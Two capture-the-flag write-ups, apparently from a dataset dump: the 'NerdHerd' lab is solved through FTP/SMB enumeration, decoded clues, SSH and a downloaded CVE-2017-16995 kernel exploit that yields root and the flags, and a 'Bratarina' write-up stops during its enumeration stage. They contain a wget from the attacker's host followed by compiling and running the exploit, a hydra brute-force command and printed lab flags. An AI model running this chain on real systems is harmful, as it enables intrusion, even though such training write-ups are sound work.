text
stringlengths
9
334k
# NerdHerd Hack your way into this easy/medium level legendary TV series "Chuck" themed box! [NerdHerd](https://tryhackme.com/room/nerdherd) ## Topic's - Network Enumeration - Linux Enumeration - FTP Enumeration - SMB Enumeration - Steganography - Cryptography - Base64 - Vigenรจre - CVE-2017-16995 - Linux Kernel < 4.13.9 ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Task 1 PWN This is the very first vulnerable machine that I've created. So, feel free to share your opinions/advices with me on my DC: 0xpr0N3rd (alright maybe for nudges too) I've enjoyed developing this box and I hope you enjoy it while solving. Hack this machine before nerd herd fellas arrive, happy hacking!!! NOTE # Please do not stream or publish any write-ups for this room at least 1 week after the release. ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ sudo nmap -A -sS -sC -sV -Pn -p- 10.10.48.80 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-31 22:59 CET Nmap scan report for 10.10.48.80 Host is up (0.050s latency). Not shown: 65530 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:45 pub | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.106.222 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 0c:84:1b:36:b2:a2:e1:11:dd:6a:ef:42:7b:0d:bb:43 (RSA) | 256 e2:5d:9e:e7:28:ea:d3:dd:d4:cc:20:86:a3:df:23:b8 (ECDSA) |_ 256 ec:be:23:7b:a9:4c:21:85:bc:a8:db:0e:7c:39:de:49 (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1337/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=10/31%OT=21%CT=1%CU=37433%PV=Y%DS=2%DC=T%G=Y%TM=5F9DDE OS:A2%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)SE OS:Q(SP=105%GCD=1%ISR=107%TI=Z%II=I%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7% OS:O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2 OS:=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNS OS:NW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y% OS:DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR% OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40% OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G% OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: Host: NERDHERD; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -39m58s, deviation: 1h09m16s, median: 0s |_nbstat: NetBIOS name: NERDHERD, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: nerdherd | NetBIOS computer name: NERDHERD\x00 | Domain name: \x00 | FQDN: nerdherd |_ System time: 2020-11-01T00:01:04+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-10-31T22:01:04 |_ start_date: N/A TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 32.15 ms 10.8.0.1 2 67.41 ms 10.10.48.80 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 80.41 seconds ``` ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ ftp 10.10.132.29 Connected to 10.10.132.29. 220 (vsFTPd 3.0.3) Name (10.10.132.29:kali): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:45 pub 226 Directory send OK. ftp> cd pub 250 Directory successfully changed. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:45 . drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:03 .. drwxr-xr-x 2 ftp ftp 4096 Sep 14 18:35 .jokesonyou -rw-rw-r-- 1 ftp ftp 89894 Sep 11 03:45 youfoundme.png 226 Directory send OK. ftp> get .jokesonyou local: .jokesonyou remote: .jokesonyou 200 PORT command successful. Consider using PASV. 550 Failed to open file. ftp> cd .jokesonyou 250 Directory successfully changed. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Sep 14 18:35 . drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:45 .. -rw-r--r-- 1 ftp ftp 28 Sep 14 18:35 hellon3rd.txt 226 Directory send OK. ftp> get hellon3rd.txt local: hellon3rd.txt remote: hellon3rd.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for hellon3rd.txt (28 bytes). 226 Transfer complete. 28 bytes received in 0.08 secs (0.3231 kB/s) ftp> ``` ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ cat hellon3rd.txt all you need is in the leet ``` ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ exiftool youfoundme.png ExifTool Version Number : 12.06 File Name : youfoundme.png Directory : . File Size : 88 kB File Modification Date/Time : 2020:10:31 21:15:39+01:00 File Access Date/Time : 2020:10:31 21:15:49+01:00 File Inode Change Date/Time : 2020:10:31 21:15:39+01:00 File Permissions : rw-r--r-- File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 894 Image Height : 894 Bit Depth : 8 Color Type : RGB with Alpha Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced Background Color : 255 255 255 Pixels Per Unit X : 3543 Pixels Per Unit Y : 3543 Pixel Units : meters Warning : [minor] Text chunk(s) found after PNG IDAT (may be ignored by some readers) Datecreate : 2010-10-26T08:00:31-07:00 Datemodify : 2010-10-26T08:00:31-07:00 Software : www.inkscape.org EXIF Orientation : 1 Exif Byte Order : Big-endian (Motorola, MM) Resolution Unit : inches Y Cb Cr Positioning : Centered Exif Version : 0231 Components Configuration : Y, Cb, Cr, - Flashpix Version : 0100 Owner Name : fijbxslz Image Size : 894x894 Megapixels : 0.799 ``` `Owner Name : fijbxslz` [https://www.boxentriq.com/code-breaking/cipher-identifier](https://www.boxentriq.com/code-breaking/cipher-identifier) ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ smbclient -L \\10.10.48.80 Enter WORKGROUP\kali's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers nerdherd_classified Disk Samba on Ubuntu IPC$ IPC IPC Service (nerdherd server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available ``` ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ smbclient \\\\10.10.48.80\\nerdherd_classified Enter WORKGROUP\kali's password: tree connect failed: NT_STATUS_ACCESS_DENIED ``` <!-- these might help: Y2liYXJ0b3dza2k= : aGVoZWdvdTwdasddHlvdQ== --> ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ echo 'Y2liYXJ0b3dza2k=' | base64 -d cibartowski ``` ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ echo 'aGVoZWdvdTwdasddHlvdQ==' | base64 -d hehegou ``` ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ enum4linux 10.10.132.29 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Nov 6 13:49:43 2020 ========================== | Target Information | ========================== Target ........... 10.10.132.29 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.132.29 | ==================================================== [+] Got domain/workgroup name: WORKGROUP ============================================ | Nbtstat Information for 10.10.132.29 | ============================================ Looking up status of 10.10.132.29 NERDHERD <00> - B <ACTIVE> Workstation Service NERDHERD <03> - B <ACTIVE> Messenger Service NERDHERD <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ===================================== | Session Check on 10.10.132.29 | ===================================== [+] Server 10.10.132.29 allows sessions using username '', password '' =========================================== | Getting domain SID for 10.10.132.29 | =========================================== Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ====================================== | OS information on 10.10.132.29 | ====================================== Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.132.29 from smbclient: [+] Got OS info for 10.10.132.29 from srvinfo: NERDHERD Wk Sv PrQ Unx NT SNT nerdherd server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03 ============================= | Users on 10.10.132.29 | ============================= index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: chuck Name: ChuckBartowski Desc: user:[chuck] rid:[0x3e8] ========================================= | Share Enumeration on 10.10.132.29 | ========================================= Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers nerdherd_classified Disk Samba on Ubuntu IPC$ IPC IPC Service (nerdherd server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.132.29 //10.10.132.29/print$ Mapping: DENIED, Listing: N/A //10.10.132.29/nerdherd_classified Mapping: DENIED, Listing: N/A //10.10.132.29/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ==================================================== | Password Policy Information for 10.10.132.29 | ==================================================== [+] Attaching to 10.10.132.29 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] NERDHERD [+] Builtin [+] Password Info for Domain: NERDHERD [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ======================================================================= | Users on 10.10.132.29 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-2306820301-2176855359-2727674639 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\chuck (Local User) S-1-22-1-1002 Unix User\ftpuser (Local User) [+] Enumerating users using SID S-1-5-21-2306820301-2176855359-2727674639 and logon username '', password '' S-1-5-21-2306820301-2176855359-2727674639-500 *unknown*\*unknown* (8) S-1-5-21-2306820301-2176855359-2727674639-501 NERDHERD\nobody (Local User) S-1-5-21-2306820301-2176855359-2727674639-513 NERDHERD\None (Domain Group) S-1-5-21-2306820301-2176855359-2727674639-1000 NERDHERD\chuck (Local User) ============================================= | Getting printer info for 10.10.132.29 | ============================================= No printers returned. enum4linux complete on Fri Nov 6 13:53:33 2020 ``` [https://www.youtube.com/watch?v=9Gc4QTqslN4](https://www.youtube.com/watch?v=9Gc4QTqslN4) [https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode('BirdistheWord')&input=ZmlqYnhzbHo](<https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode('BirdistheWord')&input=ZmlqYnhzbHo>) `easypass` ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ smbclient -U chuck \\\\10.10.132.29\\nerdherd_classified Enter WORKGROUP\chuck's password: Try "help" to get a list of possible commands. smb: \> ls -la NT_STATUS_NO_SUCH_FILE listing \-la smb: \> ls . D 0 Fri Sep 11 03:29:53 2020 .. D 0 Thu Nov 5 21:44:40 2020 secr3t.txt N 125 Fri Sep 11 03:29:53 2020 8124856 blocks of size 1024. 3414104 blocks available smb: \> get secr3t.txt getting file \secr3t.txt of size 125 as secr3t.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec) smb: \> ``` [http://10.10.132.29:1337/this1sn0tadirect0ry/](http://10.10.132.29:1337/this1sn0tadirect0ry/) [http://10.10.132.29:1337/this1sn0tadirect0ry/creds.txt](http://10.10.132.29:1337/this1sn0tadirect0ry/creds.txt) ``` alright, enough with the games. here, take my ssh creds: chuck : th1s41ntmypa5s ``` ``` kali@kali:~/CTFs/tryhackme/NerdHerd$ ssh [email protected] The authenticity of host '10.10.132.29 (10.10.132.29)' can't be established. ECDSA key fingerprint is SHA256:Zf9lZPGnZpw5EjeSwBXbXbeyTILyhw998cnd87rFDTU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.132.29' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-31-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 747 packages can be updated. 522 updates are security updates. Last login: Wed Oct 14 17:03:42 2020 from 22.0.97.11 chuck@nerdherd:~$ ls -la total 136 drwxr-xr-x 19 chuck chuck 4096 Kas 5 22:44 . drwxr-xr-x 4 root root 4096 Eyl 11 03:43 .. -rw------- 1 chuck chuck 742 Kas 5 22:44 .bash_history -rw-r--r-- 1 chuck chuck 220 Eyl 11 01:17 .bash_logout -rw-r--r-- 1 chuck chuck 3771 Eyl 11 01:17 .bashrc drwx------ 14 chuck chuck 4096 Eyl 14 19:20 .cache drwx------ 3 chuck chuck 4096 Eyl 11 03:31 .compiz drwx------ 15 chuck chuck 4096 Kas 5 22:42 .config drwxr-xr-x 2 chuck chuck 4096 Kas 5 22:43 Desktop -rw-r--r-- 1 chuck chuck 25 Eyl 11 01:32 .dmrc drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Documents drwxr-xr-x 3 chuck chuck 4096 Eyl 11 04:45 Downloads -rw-r--r-- 1 chuck chuck 8980 Eyl 11 01:17 examples.desktop drwx------ 2 chuck chuck 4096 Eki 19 11:38 .gconf drwx------ 3 chuck chuck 4096 Kas 5 22:40 .gnupg -rw------- 1 chuck chuck 4564 Kas 5 22:40 .ICEauthority drwx------ 3 chuck chuck 4096 Eyl 11 01:32 .local drwx------ 4 chuck chuck 4096 Eyl 11 02:03 .mozilla drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Music drwxrwxr-x 2 chuck chuck 4096 Eyl 11 03:29 .nano drwxr-xr-x 2 root root 4096 Eyl 11 04:29 nerdherd_classified drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Pictures -rw-r--r-- 1 chuck chuck 655 Eyl 11 01:17 .profile drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Public -rw-r--r-- 1 chuck chuck 0 Eyl 11 01:38 .sudo_as_admin_successful drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Templates -rw-rw-r-- 1 chuck chuck 46 Eyl 14 19:26 user.txt drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Videos -rw------- 1 root root 511 Eyl 11 02:58 .viminfo -rw------- 1 chuck chuck 53 Kas 5 22:40 .Xauthority -rw------- 1 chuck chuck 82 Kas 5 22:40 .xsession-errors -rw------- 1 chuck chuck 82 Kas 5 20:26 .xsession-errors.old chuck@nerdherd:~$ cat user.txt THM{7fc91d70e22e9b70f98aaf19f9a1c3ca710661be} ``` [Linux Kernel < 4.13.9](https://www.exploit-db.com/exploits/45010) `CVE-2017-16995 - Linux Kernel < 4.13.9` ``` chuck@nerdherd:~$ which gcc /usr/bin/gcc chuck@nerdherd:~$ wget 10.8.106.222/45010.c --2020-11-06 15:18:07-- http://10.8.106.222/45010.c Connecting to 10.8.106.222:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13728 (13K) [text/plain] Saving to: โ€˜45010.cโ€™ 45010.c 100%[==========================>] 13,41K --.-KB/s in 0,03s 2020-11-06 15:18:07 (408 KB/s) - โ€˜45010.cโ€™ saved [13728/13728] chuck@nerdherd:~$ gcc 45010.c -o exploit chuck@nerdherd:~$ ./exploit [.] [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t) [.] [.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel ** [.] [*] creating bpf map [*] sneaking evil bpf past the verifier [*] creating socketpair() [*] attaching bpf backdoor to socket [*] skbuff => ffff88003b52f200 [*] Leaking sock struct from ffff88003c882d00 [*] Sock->sk_rcvtimeo at offset 472 [*] Cred structure at ffff88003afbc780 [*] UID from cred structure: 1000, matches the current: 1000 [*] hammering cred structure at ffff88003afbc780 [*] credentials patched, launching shell... # whoami root # cat /root/root.txt cmon, wouldnt it be too easy if i place the root flag here? # locate root.txt /opt/.root.txt /root/root.txt # cat /opt/.root.txt nOOt nOOt! you've found the real flag, congratz! THM{5c5b7f0a81ac1c00732803adcee4a473cf1be693} # cd /root # cat .bash_history | grep -i -a thm THM{a975c295ddeab5b1a5323df92f61c4cc9fc88207} ``` 1. User Flag `THM{7fc91d70e22e9b70f98aaf19f9a1c3ca710661be}` 2. Root Flag `THM{5c5b7f0a81ac1c00732803adcee4a473cf1be693}` 3. Bonus Flag `THM{a975c295ddeab5b1a5323df92f61c4cc9fc88207}`
# Bratarina ## Table of Contents * [Summary](#summary) * [Enumerate](#enumerate) * [Ports](#ports) * [Services](#services) * [SSH](#ssh) * [SMTP](#smtp) * [HTTP](#http) * [SMB](#smb) * [OS](#os) * [Nmap OS Discovery Scan](#nmap-os-discovery-scan) * [Nmap OS Discovery Scan via SMB](#nmap-os-discovery-scan-via-smb) * [Exploit](#exploit) * [CVE-2020-7247](#cve-2020-7247) * [EDB-ID-47984](#edb-id-47984) * [Metasploit](#metasploit) * [Explore](#explore) * [Escalate](#escalate) * [Lessons Learned](#lessons-learned) ## Summary * Hostname: bratarina * Description: Bratarina is not the nicest lady in town. * IP Address: 192.168.132.71 * MAC Address: (ref:) * Domain: WORKGROUP * TCP Ports and Services * 22 * OpenSSH 7.6 * 25 * OpenSMTPd * 80 * Nginx 1.14 * FlashBB * 445 * Samba 4.7.6-Ubuntu (ref: Nmap) * OS * Distro: Ubuntu (ref: Nmap) * Kernel: Linux 2.6.32 or 3.10 (ref: Nmap) * Architecture: (ref:) * Users * root (ref: Nmap) * neil (ref: passwd.bak downloaded via smbclient) * Vulnerabilities and Exploits * CVE-2020-7247 (ref: searchsploit) * EDB-ID-48038 (ref: searchsploit) * Flag * 055124521243345de53fcee856b4fd44 * Hints * n/a # Enumerate ## Setup ```bash TARGET=192.168.132.71 NAME=bratarina new-ctf $NAME cd $NAME ``` ## Ports ```bash sudo nmap $TARGET -sS -sU --min-rate 1000 -oN scans/$NAME-nmap-initial sudo nmap $TARGET -sS -sU -p- --min-rate 1000 -oN scans/$NAME-nmap-complete sudo nmap $TARGET -sV $(print-open-ports-from-nmap-scan scans/$NAME-nmap-complete) -oN scans/$NAME-nmap-versions # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 10:59 EDT Nmap scan report for 192.168.132.71 Host is up (0.084s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp OpenSMTPD 80/tcp open http nginx 1.14.0 (Ubuntu) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: COFFEECORP) Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds ``` ## Services ### SSH Hydra was unable to guess the correct password for neil. ```bash hydra -l neil -P /usr/share/wordlists/rockyou.txt ssh://192.168.141.71 # output NSTR ``` ### SMTP Automated enumeration of supported SMTP commands. ```bash sudo nmap $TARGET -p25 --script smtp-commands -oN scans/$NAME-nmap-script-smtp-commands # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 01:20 EDT Nmap scan report for 192.168.141.71 Host is up (0.096s latency). PORT STATE SERVICE 25/tcp open smtp | smtp-commands: bratarina Hello nmap.scanme.org [192.168.49.141], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP, |_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info Nmap done: 1 IP address (1 host up) scanned in 0.83 seconds ``` Automated enumeration of existing SMTP users. Nmap reported "root" was a valid user. ```bash sudo nmap $TARGET -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -oN scans/$NAME-nmap-script-smtp-enum-users # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 01:21 EDT Failed to resolve "smtp-enum-users.methods=EXPN". Failed to resolve "smtp-enum-users.methods=RCPT". Failed to resolve "smtp-enum-users.methods=RCPT". Nmap scan report for 192.168.141.71 Host is up (0.072s latency). PORT STATE SERVICE 25/tcp open smtp | smtp-enum-users: |_ root Failed to resolve "smtp-enum-users.methods=RCPT". Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds ``` ```bash smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $TARGET # output smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.141.71 Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... VRFY Worker Processes ......... 5 Usernames file ........... /usr/share/wordlists/metasploit/unix_users.txt Target count ............. 1 Username count ........... 168 Target TCP port .......... 25 Query timeout ............ 5 secs Target domain ............ ######## Scan started at Sun Jul 4 01:07:36 2021 ######### ######## Scan completed at Sun Jul 4 01:07:47 2021 ######### 0 results. 168 queries in 11 seconds (15.3 queries / sec) ``` Automated enumeration of exploitable SMTP vulnerabilities. ```bash sudo nmap $TARGET -p25 --script smtp-vuln* -oN scans/mailman-nmap-script-smtp-vuln # output # Nmap 7.91 scan initiated Sun Jul 4 00:43:18 2021 as: nmap -p25 --script smtp-vuln* -oN scans/bratarina-nmap-script-smtp-vuln 192.168.141.71 Nmap scan report for 192.168.141.71 Host is up (0.072s latency). PORT STATE SERVICE 25/tcp open smtp | smtp-vuln-cve2010-4344: |_ The SMTP server is not Exim: NOT VULNERABLE # Nmap done at Sun Jul 4 00:43:19 2021 -- 1 IP address (1 host up) scanned in 0.74 seconds ``` ### HTTP The target provided NSTR when scanned with dirb. ```bash dirb http://$TARGET -r -z10 -o scans/$NAME-dirb-common # output ...snipped... + http://192.168.141.71/index.html (CODE:200|SIZE:612) + http://192.168.141.71/robots.txt (CODE:200|SIZE:14) ==> DIRECTORY: http://192.168.141.71/static/ ==> DIRECTORY: http://192.168.141.71/static/css/ ==> DIRECTORY: http://192.168.141.71/static/fonts/ ==> DIRECTORY: http://192.168.141.71/static/img/ ==> DIRECTORY: http://192.168.141.71/static/js/ END_TIME: Sat Jul 3 20:11:08 2021 DOWNLOADED: 27672 - FOUND: 4 ``` Nikto reported the target had no CGI directories. ```bash nikto -h $TARGET -p $PORT -T 2 -Format txt -o scans/$NAME-nikto-misconfig # output - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.141.71 + Target Hostname: 192.168.141.71 + Target Port: 80 + Start Time: 2021-07-04 01:16:23 (GMT-4) --------------------------------------------------------------------------- + Server: nginx/1.14.0 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + 1349 requests: 0 error(s) and 3 item(s) reported on remote host + End Time: 2021-07-04 01:18:34 (GMT-4) (131 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` The target is not vulnerable to Shellshock. ```bash sudo nmap $TARGET -p80 --script http-shellshock -oN scans/$NAME-nmap-script-http-shellshock # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 01:12 EDT Nmap scan report for 192.168.141.71 Host is up (0.075s latency). PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds ``` ### SMB ```bash smbclient -L $TARGET # output Enter WORKGROUP\victor's password: Anonymous login successful Sharename Type Comment --------- ---- ------- backups Disk Share for backups IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu) Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 192.168.132.71 failed (Error NT_STATUS_IO_TIMEOUT) Unable to connect with SMB1 -- no workgroup available ``` ```bash smbmap -H 192.168.141.71 # output [+] Guest session IP: 192.168.141.71:445 Name: 192.168.141.71 Disk Permissions Comment ---- ----------- ------- backups READ ONLY Share for backups IPC$ NO ACCESS IPC Service (Samba 4.7.6-Ubuntu) ``` ```bash smbclient \\\\192.168.132.71\\backups get passwd.bak exit cat passwd.bak # output root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false neil:x:1000:1000:neil,,,:/home/neil:/bin/bash _smtpd:x:1001:1001:SMTP Daemon:/var/empty:/sbin/nologin _smtpq:x:1002:1002:SMTPD Queue:/var/empty:/sbin/nologin postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash ``` ```bash sudo nmap 192.168.132.71 -A -oN scans/bratarina-nmap-aggresive # output Aggressive OS guesses: Linux 2.6.32 (88%), Linux 2.6.32 or 3.10 (88%), Linux 3.5 (88%), Linux 4.2 (88%), Linux 4.4 (88%), Synology DiskStation Manager 5.1 (88%), WatchGuard Fireware 11.8 (88%), Linux 2.6.35 (87%), Linux 2.6.39 (87%), Linux 3.10 - 3.12 (87%) No exact OS matches for host (test conditions non-ideal). OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds 